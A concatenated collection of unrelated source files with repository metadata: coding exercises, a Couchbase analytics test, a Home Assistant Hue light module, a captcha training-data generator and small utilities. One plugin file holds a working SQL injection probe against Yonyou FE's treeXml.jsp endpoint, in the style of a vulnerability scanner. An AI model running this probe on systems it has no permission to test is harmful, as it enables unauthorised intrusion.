| false
| false
| 743
|
py
|
#longest common subsequence kata
#https://www.codewars.com/kata/52756e5ad454534f220001ef
def lcs(x, y):
    """Return a common subsequence of strings `x` and `y`.

    Greedy solution for the codewars "longest common subsequence" kata:
    first drop characters absent from the other string, then walk the
    shorter sequence and consume matches from the longer one in order.
    Returns '' when the strings share no characters.
    """
    # Keep only characters that also occur in the other string.
    x = list(filter(lambda x1: x1 in y, x))
    y = list(filter(lambda x1: x1 in x, y))
    if [] in (x, y):
        return ''
    elif x == y:
        return ''.join(x)
    else:
        both = [x, y]
        lens = [len(x), len(y)]
        mindex = lens.index(min(lens[0], lens[1]))
        maxdex = lens.index(max(lens[0], lens[1]))
        output = ''
        for letter in both[mindex]:
            try:
                index = both[maxdex].index(letter)
                # Consume the longer sequence up to the match so later
                # letters can only match further right (subsequence order).
                both[maxdex] = both[maxdex][index:]
                output += letter
            # BUG FIX: was a bare `except:` that swallowed everything;
            # list.index raises ValueError when the letter is gone.
            except ValueError:
                continue
        return output
|
[
"ellismckenzielee@gmail.com"
] |
ellismckenzielee@gmail.com
|
e5b3b507e9fa57753b9a2e6d8e08d05cc8cbe038
|
ce20062fedae07a1f0ea00a7e5ab0b86e05ebe69
|
/pytests_stale/cbas/cbas_sql++_composability.py
|
0c58a774b01ed031c02d263c49c8a3c878c82beb
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
AnithaKuberan/TAF
|
256f9ee850275be5461e4d19a671c9dd19edb9f5
|
9824c6a4f1680c320ab065e23c720ffa92d530d9
|
refs/heads/master
| 2022-03-18T16:17:08.876692
| 2022-03-03T09:57:52
| 2022-03-03T09:57:52
| 206,016,123
| 0
| 0
|
Apache-2.0
| 2019-09-03T07:30:18
| 2019-09-03T07:30:18
| null |
UTF-8
|
Python
| false
| false
| 3,323
|
py
|
'''
Created on Mar 8, 2018
@author: riteshagarwal
'''
'''
Created on Jan 4, 2018
@author: riteshagarwal
'''
import json
import os
import time
from cbas_base import CBASBaseTest, TestInputSingleton
from lib.memcached.helper.data_helper import MemcachedClientHelper
from membase.api.rest_client import RestConnection
from remote.remote_util import RemoteMachineShellConnection
class SQLPP_Composability_CBAS(CBASBaseTest):
    """Run the non_unary_subplan SQL++ composability statements against the
    analytics (CBAS) service REST endpoint and assert each succeeds."""

    def setUp(self):
        self.input = TestInputSingleton.input
        # This test provisions no default KV bucket.
        self.input.test_params.update({"default_bucket":False})
        super(SQLPP_Composability_CBAS, self).setUp()
        # Optionally rebalance every CBAS node into the cluster first.
        if "add_all_cbas_nodes" in self.input.test_params and self.input.test_params["add_all_cbas_nodes"] and len(self.cluster.cbas_nodes) > 0:
            self.otpNodes.append(self.add_all_nodes_then_rebalance(self.cluster.cbas_nodes))
        # Shell on the CBAS node: statements are submitted via curl from there.
        self.shell = RemoteMachineShellConnection(self.cbas_node)

    def tearDown(self):
        super(SQLPP_Composability_CBAS, self).tearDown()

    def test_composability(self):
        """POST each .sqlpp statement file to /analytics/service and check
        the JSON response reports status == "success"."""
        bucket_username = "cbadminbucket"
        bucket_password = "password"
        url = 'http://{0}:8095/analytics/service'.format(self.cbas_node.ip)
        # Statement files grouped by the subplan flavour they exercise.
        files_dict={'union':['non_unary_subplan_01_1_ddl.sqlpp',
                             'non_unary_subplan_01.2.update.sqlpp',
                             'non_unary_subplan_01.3.query.sqlpp',
                             'non_unary_subplan_01.4.query.sqlpp',
                             'non_unary_subplan_01.5.query.sqlpp',
                             'non_unary_subplan_01.6.query.sqlpp'],
                    'inner-join':['non_unary_subplan_02.1.ddl.sqlpp',
                                  'non_unary_subplan_02.2.update.sqlpp',
                                  'non_unary_subplan_02.3.query.sqlpp',
                                  'non_unary_subplan_02.4.query.sqlpp',
                                  'non_unary_subplan_02.5.query.sqlpp',
                                  'non_unary_subplan_02.6.query.sqlpp'],
                    'outer-join':[
                                  ]
                    }
        for key in files_dict.keys():
            for query_file in files_dict[key]:
                # Submit the statement file through curl on the CBAS node.
                cmd = 'curl -s --data pretty=true --data-urlencode "statement@'+os.getcwd()+'/b/resources/non_unary_subplan_01/%s" '%query_file + url + " -u " + bucket_username + ":" + bucket_password
                output, error = self.shell.execute_command(cmd)
                response = ""
                for line in output:
                    response = response + line
                response = json.loads(response)
                self.log.info(response)
                # errors/results/handle are extracted for debugging only;
                # the assertion below is the actual check.
                if "errors" in response:
                    errors = response["errors"]
                else:
                    errors = None
                if "results" in response:
                    results = response["results"]
                else:
                    results = None
                if "handle" in response:
                    handle = response["handle"]
                else:
                    handle = None
                self.assertTrue(response["status"] == "success")
        self.shell.disconnect()
|
[
"ritesh.agarwal@couchbase.com"
] |
ritesh.agarwal@couchbase.com
|
eef1da102ec3c444d29d4f92f426ecbc184f2898
|
1d928c3f90d4a0a9a3919a804597aa0a4aab19a3
|
/python/core/2015/12/hue.py
|
77672c9aaf56db21fbbfaa6f7afeb2d80e53470e
|
[] |
no_license
|
rosoareslv/SED99
|
d8b2ff5811e7f0ffc59be066a5a0349a92cbb845
|
a062c118f12b93172e31e8ca115ce3f871b64461
|
refs/heads/main
| 2023-02-22T21:59:02.703005
| 2021-01-28T19:40:51
| 2021-01-28T19:40:51
| 306,497,459
| 1
| 1
| null | 2020-11-24T20:56:18
| 2020-10-23T01:18:07
| null |
UTF-8
|
Python
| false
| false
| 7,899
|
py
|
"""
homeassistant.components.light.hue
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Support for Hue lights.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/light.hue/
"""
import json
import logging
import os
import socket
import random
from datetime import timedelta
from urllib.parse import urlparse
from homeassistant.loader import get_component
import homeassistant.util as util
import homeassistant.util.color as color_util
from homeassistant.const import CONF_HOST, DEVICE_DEFAULT_NAME
from homeassistant.components.light import (
Light, ATTR_BRIGHTNESS, ATTR_XY_COLOR, ATTR_COLOR_TEMP,
ATTR_TRANSITION, ATTR_FLASH, FLASH_LONG, FLASH_SHORT,
ATTR_EFFECT, EFFECT_COLORLOOP, EFFECT_RANDOM, ATTR_RGB_COLOR)
REQUIREMENTS = ['phue==0.8']
MIN_TIME_BETWEEN_SCANS = timedelta(seconds=10)
MIN_TIME_BETWEEN_FORCED_SCANS = timedelta(milliseconds=100)
PHUE_CONFIG_FILE = "phue.conf"
# Map ip to request id for configuring
_CONFIGURING = {}
_LOGGER = logging.getLogger(__name__)
def _find_host_from_config(hass):
    """ Attempt to detect host based on existing configuration. """
    # phue.conf is a JSON object keyed by bridge host; any first key will do.
    path = hass.config.path(PHUE_CONFIG_FILE)

    if not os.path.isfile(path):
        return None

    try:
        with open(path) as inp:
            return next(json.loads(''.join(inp)).keys().__iter__())
    except (ValueError, AttributeError, StopIteration):
        # ValueError if can't parse as JSON
        # AttributeError if JSON value is not a dict
        # StopIteration if no keys
        return None
def setup_platform(hass, config, add_devices_callback, discovery_info=None):
    """ Gets the Hue lights. """
    # Host resolution priority: discovery result, then configuration.yaml,
    # then a previously written phue.conf.
    if discovery_info is not None:
        host = urlparse(discovery_info[1]).hostname
    else:
        host = config.get(CONF_HOST, None)

    if host is None:
        host = _find_host_from_config(hass)

    if host is None:
        _LOGGER.error('No host found in configuration')
        return False

    # Only act if we are not already configuring this host
    if host in _CONFIGURING:
        return

    setup_bridge(host, hass, add_devices_callback)
def setup_bridge(host, hass, add_devices_callback):
    """ Setup a phue bridge based on host parameter. """
    import phue

    try:
        bridge = phue.Bridge(
            host,
            config_file_path=hass.config.path(PHUE_CONFIG_FILE))
    except ConnectionRefusedError:  # Wrong host was given
        _LOGGER.exception("Error connecting to the Hue bridge at %s", host)
        return
    except phue.PhueRegistrationException:
        # Bridge reachable but the link button has not been pressed yet;
        # fall back to the interactive configurator flow.
        _LOGGER.warning("Connected to Hue at %s but not registered.", host)
        request_configuration(host, hass, add_devices_callback)
        return

    # If we came here and configuring this host, mark as done
    if host in _CONFIGURING:
        request_id = _CONFIGURING.pop(host)
        configurator = get_component('configurator')
        configurator.request_done(request_id)

    # light_id -> HueLight cache, closed over by update_lights below.
    lights = {}

    @util.Throttle(MIN_TIME_BETWEEN_SCANS, MIN_TIME_BETWEEN_FORCED_SCANS)
    def update_lights():
        """ Updates the Hue light objects with latest info from the bridge. """
        try:
            api = bridge.get_api()
        except socket.error:
            # socket.error when we cannot reach Hue
            _LOGGER.exception("Cannot reach the bridge")
            return

        api_states = api.get('lights')

        if not isinstance(api_states, dict):
            _LOGGER.error("Got unexpected result from Hue API")
            return

        new_lights = []

        for light_id, info in api_states.items():
            if light_id not in lights:
                # First sighting: wrap it in a HueLight entity.
                lights[light_id] = HueLight(int(light_id), info,
                                            bridge, update_lights)
                new_lights.append(lights[light_id])
            else:
                # Known light: refresh its cached state in place.
                lights[light_id].info = info

        if new_lights:
            add_devices_callback(new_lights)

    update_lights()
def request_configuration(host, hass, add_devices_callback):
    """ Request configuration steps from the user. """
    configurator = get_component('configurator')

    # We got an error if this method is called while we are configuring
    if host in _CONFIGURING:
        configurator.notify_errors(
            _CONFIGURING[host], "Failed to register, please try again.")
        return

    # pylint: disable=unused-argument
    def hue_configuration_callback(data):
        """ Actions to do when our configuration callback is called. """
        # Retry the bridge setup; on success setup_bridge marks this
        # configuration request as done.
        setup_bridge(host, hass, add_devices_callback)

    _CONFIGURING[host] = configurator.request_config(
        hass, "Philips Hue", hue_configuration_callback,
        description=("Press the button on the bridge to register Philips Hue "
                     "with Home Assistant."),
        description_image="/static/images/config_philips_hue.jpg",
        submit_caption="I have pressed the button"
    )
class HueLight(Light):
    """ Represents a Hue light """

    def __init__(self, light_id, info, bridge, update_lights):
        self.light_id = light_id
        # Raw state dict for this light as returned by the bridge API.
        self.info = info
        self.bridge = bridge
        # Throttled callable that refreshes `info` from the bridge.
        self.update_lights = update_lights

    @property
    def unique_id(self):
        """ Returns the id of this Hue light """
        return "{}.{}".format(
            self.__class__, self.info.get('uniqueid', self.name))

    @property
    def name(self):
        """ Get the name of the Hue light. """
        return self.info.get('name', DEVICE_DEFAULT_NAME)

    @property
    def brightness(self):
        """ Brightness of this light between 0..255. """
        return self.info['state']['bri']

    @property
    def xy_color(self):
        """ XY color value. """
        return self.info['state'].get('xy')

    @property
    def color_temp(self):
        """ CT color value. """
        return self.info['state'].get('ct')

    @property
    def is_on(self):
        """ True if device is on. """
        self.update_lights()
        return self.info['state']['reachable'] and self.info['state']['on']

    def turn_on(self, **kwargs):
        """ Turn the specified or all lights on. """
        command = {'on': True}

        if ATTR_TRANSITION in kwargs:
            # The bridge expresses transition time in 1/10ths of a second.
            command['transitiontime'] = kwargs[ATTR_TRANSITION] * 10

        if ATTR_BRIGHTNESS in kwargs:
            command['bri'] = kwargs[ATTR_BRIGHTNESS]

        # XY takes precedence over RGB when both are supplied.
        if ATTR_XY_COLOR in kwargs:
            command['xy'] = kwargs[ATTR_XY_COLOR]
        elif ATTR_RGB_COLOR in kwargs:
            command['xy'] = color_util.color_RGB_to_xy(
                *(int(val) for val in kwargs[ATTR_RGB_COLOR]))

        if ATTR_COLOR_TEMP in kwargs:
            command['ct'] = kwargs[ATTR_COLOR_TEMP]

        flash = kwargs.get(ATTR_FLASH)

        if flash == FLASH_LONG:
            command['alert'] = 'lselect'
        elif flash == FLASH_SHORT:
            command['alert'] = 'select'
        else:
            command['alert'] = 'none'

        effect = kwargs.get(ATTR_EFFECT)

        if effect == EFFECT_COLORLOOP:
            command['effect'] = 'colorloop'
        elif effect == EFFECT_RANDOM:
            # "Random" is emulated with a random hue/saturation pair.
            command['hue'] = random.randrange(0, 65535)
            command['sat'] = random.randrange(150, 254)
        else:
            command['effect'] = 'none'

        self.bridge.set_light(self.light_id, command)

    def turn_off(self, **kwargs):
        """ Turn the specified or all lights off. """
        command = {'on': False}

        if ATTR_TRANSITION in kwargs:
            # Transition time is in 1/10th seconds and cannot exceed
            # 900 seconds.
            command['transitiontime'] = min(9000, kwargs[ATTR_TRANSITION] * 10)

        self.bridge.set_light(self.light_id, command)

    def update(self):
        """ Synchronize state with bridge. """
        self.update_lights(no_throttle=True)
|
[
"rodrigosoaresilva@gmail.com"
] |
rodrigosoaresilva@gmail.com
|
d6a628d30cd50796fad7346cedd8050cae518409
|
f87f51ec4d9353bc3836e22ac4a944951f9c45c0
|
/.history/HW03_20210706185704.py
|
4de89390673cdc7ea96c6258834fddd35d0d6aae
|
[] |
no_license
|
sanjayMamidipaka/cs1301
|
deaffee3847519eb85030d1bd82ae11e734bc1b7
|
9ddb66596497382d807673eba96853a17884d67b
|
refs/heads/main
| 2023-06-25T04:52:28.153535
| 2021-07-26T16:42:44
| 2021-07-26T16:42:44
| 389,703,530
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,061
|
py
|
"""
Georgia Institute of Technology - CS1301
HW03 - Strings and Lists
Collaboration Statement:
"""
#########################################
"""
Function Name: movieNight()
Parameters: subtitle (str)
Returns: fixed subtitle (str)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def movieNight(subtitle):
    """Return `subtitle` with every digit character removed."""
    return ''.join(ch for ch in subtitle if not ch.isdigit())
"""
Function Name: longestWord()
Parameters: sentence (str)
Returns: longest word (str)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def longestWord(sentence):
    """Return the longest space-separated word after dropping commas.

    Ties are broken in favour of the word that appears last.
    """
    best, best_len = '', 0
    for word in sentence.replace(',', '').split(' '):
        if len(word) >= best_len:
            best, best_len = word, len(word)
    return best
"""
Function Name: tennisMatch()
Parameters: player1 (str), player2 (str), matchRecord (str)
Returns: game statement (str)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def tennisMatch(player1, player2, matchRecord):
    """Report the winner of a match encoded in `matchRecord`.

    Each '1'/'2' is a point for that player; '-' closes a game, awarded to
    whoever has more points (ties award nobody). Returns a result string,
    or None when the players win the same number of games.
    """
    games = {1: 0, 2: 0}
    points = {1: 0, 2: 0}
    for mark in matchRecord:
        if mark == '1':
            points[1] += 1
        elif mark == '2':
            points[2] += 1
        elif mark == '-':
            # Game over: award it to the points leader, then reset.
            if points[1] > points[2]:
                games[1] += 1
            elif points[2] > points[1]:
                games[2] += 1
            points = {1: 0, 2: 0}
    if games[1] > games[2]:
        return f"{player1} won! The score was {games[1]}-{games[2]}"
    elif games[2] > games[1]:
        return f"{player2} won! The score was {games[2]}-{games[1]}"
    else:
        return
"""
Function Name: freshFruit()
Parameters: barcodes (list), startIndex (int), stopIndex (int)
Returns: freshest barcode (int)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
"""
Function Name: highestSum()
Parameters: stringList (list)
Returns: highest sum index (int)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
# subtitle = "Mr. and M4rs. Dursley of nu28mber four, Privet Drive, wer903e proud to say th6at they we6re perfectly norm3al, tha894nk you ve89ry much."
# print(movieNight(subtitle))
# sentence = " abc def ghi jkl mno "
# print(longestWord(sentence))
|
[
"sanjay.mamidipaka@gmail.com"
] |
sanjay.mamidipaka@gmail.com
|
6ffb5a7913c10d585f3deb2048cc818c0cfc1870
|
e0c8662a56d89730043146ddc340e9e0b9f7de72
|
/plugin/117c19ce-1596.py
|
c48b541558f6dace7b69689c04f13acc0ba485e2
|
[] |
no_license
|
izj007/bugscan_poc
|
f2ef5903b30b15c230b292a1ff2dc6cea6836940
|
4490f3c36d4033bdef380577333722deed7bc758
|
refs/heads/master
| 2020-09-22T17:20:50.408078
| 2019-01-18T09:42:47
| 2019-01-18T09:42:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 517
|
py
|
#coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
# FE5.5
# http://www.wooyun.org/bugs/wooyun-2010-086697
def assign(service, arg):
    """Accept only the 'yongyou_fe' service; any other service yields None."""
    return (True, arg) if service == "yongyou_fe" else None
def audit(arg):
    """Probe the FE 5.5 treeXml.jsp SQL injection (WooYun-2010-086697)."""
    # Inject a single quote (%27) into the `code` parameter; an exposed
    # "bad SQL grammar" message in the response indicates injectability.
    url = arg + '/common/treeXml.jsp?type=sort&lx=3&code=1%27'
    _, head, body, _, _ = curl.curl(url)
    if body and body.find('bad SQL grammar [];') != -1:
        security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('yongyou_fe', 'http://www.example.com/')[1])
|
[
"yudekui@wsmtec.com"
] |
yudekui@wsmtec.com
|
ed530119e7417142f6eadadd59dea9e964ffb5dd
|
535f6b7a0635233dead58a4d8ef203b32c43ff2a
|
/实验/AI2019_SA19225404_吴语港_Lab4_TF1.x/量化个人教学/假量化/generate.py
|
0d79b3a5b26dbcb9fe2aa08daee608ec403dafc4
|
[] |
no_license
|
jessenmeng/USTC_SSE_AI
|
6cff7c6a1671a4e503727eea4ef9b455d41b166d
|
fa7891d69edfa719b509d1af894f7b6aa23e0b7e
|
refs/heads/master
| 2022-12-25T19:32:39.320723
| 2020-10-10T06:08:19
| 2020-10-10T06:08:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,053
|
py
|
from captcha.image import ImageCaptcha # pip install captcha
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
import random
import cv2
#生成字符对应的验证码
class generateCaptcha():
    """Generate 4-letter captcha images plus one-hot label vectors."""

    # Character pool used when generating captcha text (lowercase only).
    alphabet = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']

    def random_captcha_text(self,char_set=alphabet, captcha_size=4):
        """Return `captcha_size` randomly chosen characters as a list."""
        captcha_text = []
        for i in range(captcha_size):
            c = random.choice(char_set)
            captcha_text.append(c)
        return captcha_text

    def gen_captcha_text_and_image(self):
        """Render a random text into a 160x60 image; return (text, ndarray)."""
        image = ImageCaptcha(width = 160,height = 60)
        captcha_text = self.random_captcha_text()
        captcha_text = ''.join(captcha_text)  # join the character list into one string
        captcha = image.generate(captcha_text)
        captcha_image = Image.open(captcha)
        captcha_image = np.array(captcha_image)
        return captcha_text, captcha_image

    def vec2text(self,char_pos):
        """Decode per-position class indices back to characters.

        Indices 0-25 map to 'A'-'Z' and 26-51 to 'a'-'z'.
        NOTE(review): generation draws from lowercase only (`alphabet`),
        so the uppercase branch looks unreachable in practice -- confirm.
        """
        text = []
        for i, c in enumerate(char_pos):
            char_idx = c % 52
            if char_idx < 26:
                char_code = char_idx + ord('A')
            elif char_idx < 52:
                char_code = char_idx - 26 + ord('a')
            text.append(chr(char_code))
        return "".join(text)

    def text2vec(self,text):
        """Encode `text` (4 chars) as a flat one-hot vector of shape (4*52,)."""
        vector = np.zeros(4 * 52)
        def char2pos(c):
            # 'A'-'Z' -> 0-25; otherwise treated as lowercase: 'a'-'z' -> 26-51.
            k = ord(c) - 65
            if k > 25:
                k = ord(c) - 71
            return k
        for i, c in enumerate(text):
            idx = i * 52 + char2pos(c)
            vector[idx] = 1
        return vector

    def get_imgs(self,num):
        # Build `num` (image, label) training pairs.
        train_imgs = np.zeros(num*160*60).reshape(num,160*60)
        test_labels = np.zeros(num*52*4).reshape(num,52*4)
        for i in range(num):
            text, image = self.gen_captcha_text_and_image()
            # Grayscale via channel mean, flatten, scale to [0, 1].
            train_imgs[i,:] = np.mean(image,-1).flatten()/255
            test_labels[i,:] = self.text2vec(text)
        return train_imgs, test_labels
|
[
"321699849@qq.com"
] |
321699849@qq.com
|
56f4aa1fac68ae607b647d5e6fbc8b7e2273b221
|
393a393bb593ec5813aa16a96384a62128eed643
|
/ocr/src/processor/utility/common.py
|
a2e4d435f20872df95db8efa7de86379206bf01a
|
[] |
no_license
|
normanyahq/kejinyan
|
4b0d40559b0f6b715107aa38fe800539ba485f27
|
486403fcf393077fefb441cb64c217a2289aaf3e
|
refs/heads/master
| 2023-06-24T13:43:52.740419
| 2017-10-09T04:29:50
| 2017-10-09T04:29:50
| 84,788,246
| 7
| 6
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 662
|
py
|
import random
import datetime
import string
import time
def getSquareDist(p1, p2):
    """Squared Euclidean distance between 2-D points (coords coerced to int)."""
    dx = int(p1[0]) - int(p2[0])
    dy = int(p1[1]) - int(p2[1])
    return dx * dx + dy * dy
def generateFileName():
    """Return a unique-ish PNG file name: timestamp token + '.png'."""
    return getToken() + ".png"
def getToken():
    # Token = current timestamp (second precision) + 10 random alphanumerics.
    # Python 2 only: string.uppercase/lowercase were removed in Python 3
    # (use ascii_uppercase/ascii_lowercase there).
    # NOTE(review): `random` is not cryptographically secure; if these
    # tokens guard anything sensitive, use the `secrets` module instead.
    return datetime.datetime.now().strftime("%Y%m%d%H%M%S") \
        + "".join([random.choice(string.uppercase + string.lowercase + string.digits)
                   for i in range(0, 10)])
def timeit(f):
    """Decorator: print the wall-clock duration of each call to `f`.

    Python 2 syntax (print statement).
    NOTE(review): consider functools.wraps to preserve f's metadata.
    """
    def timed(*args, **kw):
        ts = time.time()
        result = f(*args, **kw)
        te = time.time()
        print 'func:%r took: %2.4f sec' % \
            (f.__name__, te-ts)
        return result
    return timed
|
[
"normanyahq@gmail.com"
] |
normanyahq@gmail.com
|
eb3fc4058efee853d8bc2aa246422e6bdbc51da6
|
d2b81eacad849b66066b3b5d244b59f0144e8a0e
|
/python_do_sth/cv_3.py
|
aeda29e7cdd4d57cd02874d675fcffcae122bafc
|
[] |
no_license
|
Kaiping23/Automatic_operation_and_maintenance
|
ba88d7c2590fb6a23c20167d7273e06b037dfc52
|
4a659c91c44a0ef7c4701199f1ee49072bad98dd
|
refs/heads/master
| 2021-07-13T23:28:20.890603
| 2020-12-01T07:23:47
| 2020-12-01T07:23:47
| 222,401,688
| 0
| 2
| null | 2020-09-14T03:18:31
| 2019-11-18T08:42:26
|
Shell
|
UTF-8
|
Python
| false
| false
| 860
|
py
|
#!/usr/bin/python3
# _*_coding=utf-8 _*_
# @author lkp
# @date 2020/3/31 17:50
from PIL import Image, ImageDraw, ImageFont
import cv2
import os
def draw(pic):
    """Render 'pic/<pic>' as character art: one glyph per n x n pixel block,
    coloured from that block's top-left pixel, saved to 'new/new_<pic>'."""
    img = cv2.imread('pic/' + pic)
    img = img[:, :, (2, 1, 0)]  # reorder BGR (OpenCV) -> RGB (PIL)
    # BUG FIX: "white" was inside the size list (TypeError); it is the
    # separate fill-colour argument of Image.new.
    blank = Image.new("RGB", [len(img[0]), len(img)], "white")
    drawObj = ImageDraw.Draw(blank)
    n = 10  # sampling step: one drawn character per n x n pixel block
    # NOTE(review): this font path looks suspect ("Microsoft YaHer UI"
    # directory + msgothic.ttc) -- verify it exists on the target machine.
    font = ImageFont.truetype('C:\Windows\Fonts\Microsoft YaHer UI/msgothic.ttc', size=n - 1)
    for i in range(0, len(img), n):
        # BUG FIX: step n was passed to len() instead of range()
        # (len(img[i], n) raises TypeError).
        for j in range(0, len(img[i]), n):
            text = '武汉加油'
            # Pack the sampled RGB pixel into the draw colour.
            drawObj.ink = img[i][j][0] + img[i][j][1] * 256 + img[i][j][2] * 256 * 256
            drawObj.text([j, i], text[int(j / n) % len(text)], font=font)
            print('完成处理-----', i, j)
    blank.save('new/new_' + pic, 'jpeg')
filelist = os.listdir('pic')
for file in filelist:
draw(file)
|
[
"admin@example.com"
] |
admin@example.com
|
1b73266fec9ad8adc485a161f7ef19f92c9e3161
|
536bce6ca78a9a151247b51acb8c375c9db7445f
|
/chapter2/2.33-fact.py
|
f39322d3d7ba4b95c64460e082de81bd82d43e19
|
[] |
no_license
|
clicianaldoni/aprimeronpython
|
57de34313f4fd2a0c69637fefd60b0fb5861f859
|
a917b62bec669765a238c4b310cc52b79c7df0c9
|
refs/heads/master
| 2023-01-28T18:02:31.175511
| 2023-01-23T08:14:57
| 2023-01-23T08:14:57
| 112,872,454
| 0
| 0
| null | 2017-12-02T19:55:40
| 2017-12-02T19:55:40
| null |
UTF-8
|
Python
| false
| false
| 189
|
py
|
"""
Implement the factorial function
"""
def fact(n):
    """Return n! for a non-negative integer n.

    BUG FIX: the original returned `n` for n in (0, 1), so fact(0) was 0,
    but 0! == 1 by definition.
    """
    if n == 0 or n == 1:
        return 1
    total = 1
    while n > 1:
        total *= n
        n -= 1
    return total
print fact(4)
|
[
"martin@rodvand.net"
] |
martin@rodvand.net
|
f5beb8c7f2fe29d2b3875d2c777fa120da672849
|
3af6960c805e9903eb27c09d8bc7ebc77f5928fe
|
/problems/0095_Unique_Binary_Search_Trees_II/__init__.py
|
9d3b0685feaf5e1088c97cabc9af771655025d5e
|
[] |
no_license
|
romain-li/leetcode
|
b3c8d9d4473eebd039af16ad2d4d99abc2768bdd
|
5e82b69bd041c2c168d75cb9179a8cbd7bf0173e
|
refs/heads/master
| 2020-06-04T20:05:03.592558
| 2015-06-08T18:05:03
| 2015-06-08T18:05:03
| 27,431,664
| 2
| 1
| null | 2015-06-08T18:05:04
| 2014-12-02T12:31:58
|
Python
|
UTF-8
|
Python
| false
| false
| 1,040
|
py
|
ID = '95'
TITLE = 'Unique Binary Search Trees II'
DIFFICULTY = 'Medium'
URL = 'https://oj.leetcode.com/problems/unique-binary-search-trees-ii/'
BOOK = False
PROBLEM = r"""Given _n_, generate all structurally unique **BST's** (binary search trees)
that store values 1..._n_.
For example,
Given _n_ = 3, your program should return all 5 unique BST's shown below.
1 3 3 2 1
\ / / / \ \
3 2 1 1 3 2
/ / \ \
2 1 2 3
confused what `"{1,#,2,3}"` means? > read more on how binary tree is
serialized on OJ.
**OJ's Binary Tree Serialization:**
The serialization of a binary tree follows a level order traversal, where '#'
signifies a path terminator where no node exists below.
Here's an example:
1
/ \
2 3
/
4
\
5
The above binary tree is serialized as `"{1,2,3,#,#,4,#,#,5}"`.
"""
|
[
"romain_li@163.com"
] |
romain_li@163.com
|
b0b3f0dbcdb5f3398cb9d799cf00fb967cd0f87f
|
466912406272829982f75854cf0104c6ce8c9814
|
/data/spider2/migrate/domain_2_beian.py
|
85b21c4c99d1c2c7c4d92cd71141911c01a78701
|
[] |
no_license
|
logonmy/Codes
|
9631fa103fc499663361fa7eeccd7cedb9bb08e4
|
92723efdeccfc193f9ee5d0ab77203c254f34bc2
|
refs/heads/master
| 2021-09-21T18:07:22.985184
| 2018-08-30T05:53:26
| 2018-08-30T05:53:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,596
|
py
|
# -*- coding: utf-8 -*-
import os, sys
from pymongo import MongoClient
import pymongo
reload(sys)
sys.setdefaultencoding("utf-8")
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../util'))
import loghelper, config
import db
import name_helper
#logger
loghelper.init_logger("domain_2_beian", stream=True)
logger = loghelper.get_logger("domain_2_beian")
#mongo
mongo = db.connect_mongo()
collection = mongo.info.beian
if __name__ == '__main__':
logger.info("Begin...")
conn = db.connect_torndb()
domains = conn.query("select * from domain")
for domain in domains:
if domain["beianhao"] is None:
continue
logger.info(domain["domain"])
domain.pop("id")
domain.pop("companyId")
domain.pop("createUser")
domain.pop("modifyUser")
domain.pop("confidence")
domain.pop("verify")
domain.pop("active")
beian = collection.find_one({"domain":domain["domain"],"organizer":domain["organizer"]})
if beian is None:
collection.insert(domain)
#break
domains = conn.query("select * from source_domain")
for domain in domains:
if domain["beianhao"] is None:
continue
logger.info(domain["domain"])
domain.pop("id")
domain.pop("sourceCompanyId")
domain.pop("verify")
beian = collection.find_one({"domain":domain["domain"],"organizer":domain["organizer"]})
if beian is None:
collection.insert(domain)
#break
conn.close()
logger.info("End.")
|
[
"hush_guo@163.com"
] |
hush_guo@163.com
|
274d97a41930b485884225a410ffc761c904177b
|
254ef44b90485767a3aea8cbe77dc6bf77dddaeb
|
/605种花问题.py
|
d57acf9ac517c69f15cf6872c969cf4d6f949943
|
[] |
no_license
|
XinZhaoFu/leetcode_moyu
|
fae00d52a52c090901021717df87b78d78192bdb
|
e80489923c60ed716d54c1bdeaaf52133d4e1209
|
refs/heads/main
| 2023-06-19T02:50:05.256149
| 2021-07-09T00:50:41
| 2021-07-09T00:50:41
| 331,243,022
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 996
|
py
|
"""
假设有一个很长的花坛,一部分地块种植了花,另一部分却没有。可是,花不能种植在相邻的地块上,它们会争夺水源,两者都会死去。
给你一个整数数组 flowerbed 表示花坛,由若干 0 和 1 组成,其中 0 表示没种植花,1 表示种植了花。另有一个数 n ,能否在不打破种植规则的情况下种入 n 朵花?能则返回 true ,不能则返回 false。
示例 1:
输入:flowerbed = [1,0,0,0,1], n = 1
输出:true
"""
class Solution(object):
    def canPlaceFlowers(self, flowerbed, n):
        """
        Return True if at least n new flowers can be planted in flowerbed
        without any two flowers (existing or new) being adjacent.

        :type flowerbed: List[int]  # 0 = empty plot, 1 = planted
        :type n: int
        :rtype: bool
        """
        # Work on a padded copy so the caller's list is never mutated and
        # the two boundary plots need no special-casing.
        beds = [0] + list(flowerbed) + [0]
        planted = 0
        for i in range(1, len(beds) - 1):
            # Greedy: plant whenever the plot and both neighbours are empty.
            if beds[i - 1] == 0 and beds[i] == 0 and beds[i + 1] == 0:
                beds[i] = 1
                planted += 1
                if planted >= n:  # early exit once enough spots are found
                    return True
        return planted >= n
|
[
"948244817@qq.com"
] |
948244817@qq.com
|
1bc65433c162da913b092d7c9fdf5baab419a75a
|
8853462a79608b7e5b7af94dbfa6c0a63c1f6b6a
|
/2. Crawlers/CASNET_policy/Generated_data/temp.py
|
f77dd43e3977f455dd80c26bb735b579e07b95d0
|
[] |
no_license
|
Ashish017/CASNET
|
eaae2552f8d56413f756c7d3839cd6f548a6e1ef
|
73ec542c4c3fa1f97686796f0c385c71cad3e8d5
|
refs/heads/master
| 2023-02-06T06:53:27.362356
| 2020-12-27T04:43:34
| 2020-12-27T04:43:34
